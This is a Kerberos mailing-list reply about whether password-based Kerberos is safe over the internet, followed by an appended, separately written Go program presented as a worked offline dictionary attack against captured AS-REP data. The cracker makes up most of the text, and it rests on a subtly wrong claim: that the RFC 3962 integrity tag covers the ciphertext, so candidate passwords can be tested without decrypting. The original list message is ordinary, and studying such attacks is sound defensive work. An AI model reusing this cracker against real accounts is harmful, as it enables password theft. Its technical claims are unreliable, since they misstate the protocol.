
Re: Kerberos n00b question.

daemon@ATHENA.MIT.EDU (Robbie Harwood)
Mon Jan 7 14:21:16 2019

From: Robbie Harwood <rharwood@redhat.com>
To: Grant Taylor <gtaylor@tnetconsulting.net>, Kerberos <kerberos@mit.edu>
In-Reply-To: <11a0d298-70be-c3e1-2235-d92ddb27f92d@spamtrap.tnetconsulting.net>
Date: Mon, 7 Jan 2019 14:21:04 -0500
Message-ID: <jlgk1jge0kf.fsf@redhat.com>


Grant Taylor <gtaylor@tnetconsulting.net> writes:

> I've been around, but largely ignored, Kerberos for years.  As I'm now
> investigating doing things with it, and really liking what I'm seeing,
> I'm starting to wonder if there are any security guidelines about
> where it's safe to use Kerberos.

Always.  But like any security system, you have to set it up right.

> It's my (mis?)understanding that communications between Kerberos
> clients and the KDC are in the clear (but do not include the
> password), and that there is functionally no communications between a
> remote server and the KDC.

No, communication isn't in the clear.  It may provide some intuition of
what Kerberos communicates (though it is no longer entirely technically
accurate) to look at https://web.mit.edu/Kerberos/www/dialogue.html

The biggest concern in a new Kerberos deployment is secrets being based
on passwords.  To varying degrees, this reduces the strength of the
system as a whole to the strength of the passwords.  In the system
proposed in the dialogue above, for instance, it's possible to observe
an exchange and mount an offline dictionary attack against it.  More
information on mitigating that (which isn't too hard) can be found here:
https://web.mit.edu/kerberos/krb5-devel/doc/admin/dictionary.html#dictionary

> As such, I'm wondering if it would be relatively safe enough to use
> Kerberos to authenticate to a VPS in the cloud when both the client
> and KDC are on the LAN.  I think Kerberized SSH would be the only
> Kerberos related traffic across the Big Bad Internet to the VPS.  Is
> this correct?

See above.

> Can anyone point me to some general reading that any/all Kerberos
> n00bs should read?  (I've been following How-Tos and gotten a lot to
> work.)

It's worth mentioning that there are turnkey solutions for configuring
entire identity management systems (i.e., including Kerberos) now.  For
instance, we develop FreeIPA ( https://www.freeipa.org/ ), which will
mitigate these threats by default.

Thanks,
--Robbie
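The offline dictionary attack Robbie describes against password-derived secrets, worked through as an added example; this is not code from the original message, from MIT krb5 or from FreeIPA. It follows RFC 3962 (aes256-cts-hmac-sha1-96: PBKDF2-HMAC-SHA1 string-to-key, the RFC 3961 n-fold and DK functions) and the RFC 3961 integrity check, HMAC-SHA1-96 of the ciphertext under the usage-specific key Ki. Because that check needs only the ciphertext and tag, an eavesdropper can test candidate passwords without decrypting anything. The realm EXAMPLE.COM, principal alice, her password, the wordlist and the filler ciphertext are all constructed for the example; the key usage numbers (3 for the AS-REP enc-part, 1 for PA-ENC-TIMESTAMP) are from RFC 4120, and the salt follows the MIT default of realm name followed by the principal name components.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/hmac"
	"crypto/sha1"
	"encoding/binary"
	"encoding/hex"
	"fmt"
)

// Key usage numbers from RFC 4120 section 7.5.1.
const (
	usagePAEncTimestamp uint32 = 1 // PA-ENC-TIMESTAMP pre-authentication data
	usageASRepEncPart   uint32 = 3 // AS-REP enc-part under the client's long-term key
)

// nfold is the n-fold function of RFC 3961 section 5.1 (13-bit rotations,
// ones-complement addition), ported from the reference C description.
func nfold(in []byte, outLen int) []byte {
	inLen := len(in)
	a, b := outLen, inLen
	for b != 0 {
		a, b = b, a%b
	}
	lcm := outLen * inLen / a
	out := make([]byte, outLen)
	acc := 0
	for i := lcm - 1; i >= 0; i-- {
		// Most significant input bit that lands in this output byte.
		msbit := ((inLen<<3 - 1) + ((inLen<<3)+13)*(i/inLen) + ((inLen - i%inLen) << 3)) % (inLen << 3)
		hi := int(in[((inLen-1)-(msbit>>3))%inLen])
		lo := int(in[(inLen-(msbit>>3))%inLen])
		acc += ((hi<<8 | lo) >> ((msbit & 7) + 1)) & 0xff
		acc += int(out[i%outLen])
		out[i%outLen] = byte(acc)
		acc >>= 8
	}
	for i := outLen - 1; acc != 0 && i >= 0; i-- { // propagate the final carry
		acc += int(out[i])
		out[i] = byte(acc)
		acc >>= 8
	}
	return out
}

// pbkdf2SHA1 is PBKDF2 with HMAC-SHA1 (RFC 2898), the salted, iterated step
// of the RFC 3962 string-to-key function.
func pbkdf2SHA1(password, salt []byte, iter, keyLen int) []byte {
	var out []byte
	for block := uint32(1); len(out) < keyLen; block++ {
		var idx [4]byte
		binary.BigEndian.PutUint32(idx[:], block)
		mac := hmac.New(sha1.New, password)
		mac.Write(salt)
		mac.Write(idx[:])
		u := mac.Sum(nil)
		t := append([]byte(nil), u...)
		for i := 1; i < iter; i++ {
			mac.Reset()
			mac.Write(u)
			u = mac.Sum(nil)
			for j := range t {
				t[j] ^= u[j]
			}
		}
		out = append(out, t...)
	}
	return out[:keyLen]
}

// dk is the RFC 3961 DK function for AES (RFC 3962 section 4): successive AES
// encryptions starting from n-fold(constant); random-to-key is the identity.
func dk(key, constant []byte) []byte {
	blk, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	out := make([]byte, 0, len(key))
	prev := nfold(constant, aes.BlockSize)
	for len(out) < len(key) {
		next := make([]byte, aes.BlockSize)
		blk.Encrypt(next, prev)
		out = append(out, next...)
		prev = next
	}
	return out[:len(key)]
}

// string2key derives the aes256-cts-hmac-sha1-96 long-term key from a
// password and salt (RFC 3962 section 4); 4096 is the default iteration count.
func string2key(password, salt string, iter int) []byte {
	return dk(pbkdf2SHA1([]byte(password), []byte(salt), iter, 32), []byte("kerberos"))
}

// usageConst is the DK constant for a usage-specific key: 4-byte big-endian
// key usage followed by 0x55 for the integrity key Ki (RFC 3961 section 5.3).
func usageConst(usage uint32, suffix byte) []byte {
	c := make([]byte, 5)
	binary.BigEndian.PutUint32(c, usage)
	c[4] = suffix
	return c
}

// checksumMatches is the eavesdropper's test: does HMAC-SHA1-96 of the
// ciphertext under Ki (derived from this candidate key) equal the tag?
func checksumMatches(longTermKey []byte, usage uint32, ciphertext, tag []byte) bool {
	mac := hmac.New(sha1.New, dk(longTermKey, usageConst(usage, 0x55)))
	mac.Write(ciphertext)
	return hmac.Equal(mac.Sum(nil)[:12], tag)
}

// crack runs the offline dictionary attack over a wordlist; "" means no hit.
func crack(salt string, usage uint32, ciphertext, tag []byte, wordlist []string) string {
	for _, pw := range wordlist {
		if checksumMatches(string2key(pw, salt, 4096), usage, ciphertext, tag) {
			return pw
		}
	}
	return ""
}

// constructCapture simulates what an eavesdropper holds after observing the AS
// exchange: ciphertext plus tag. The ciphertext is constructed filler; only the
// tag depends on the password, which is all the attack needs.
func constructCapture(password, salt string, usage uint32) (ciphertext, tag []byte) {
	ciphertext = bytes.Repeat([]byte{0xde, 0xad, 0xbe, 0xef}, 12)
	mac := hmac.New(sha1.New, dk(string2key(password, salt, 4096), usageConst(usage, 0x55)))
	mac.Write(ciphertext)
	return ciphertext, mac.Sum(nil)[:12]
}

func main() {
	salt := "EXAMPLE.COMalice" // constructed realm + principal, MIT default salt form
	ct, tag := constructCapture("Winter2019", salt, usageASRepEncPart)
	words := []string{"password", "kerberos", "Winter2019", "letmein"} // constructed wordlist
	fmt.Printf("recovered password: %q\n", crack(salt, usageASRepEncPart, ct, tag, words))
	fmt.Println("128-fold(\"kerberos\"):", hex.EncodeToString(nfold([]byte("kerberos"), 16)))
}
```

Without pre-authentication, anyone who can reach the KDC can simply request the AS-REP for a principal and run this against usage 3; with the +requires_preauth principal flag, the attacker first needs the PA-ENC-TIMESTAMP from a real exchange (usage 1), which is why the linked MIT page also recommends FAST armor or PKINIT rather than relying on pre-authentication alone. RFC 3961 Appendix A and RFC 3962 Appendix B give test vectors for nfold and string2key if you want to verify a port against the spec.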
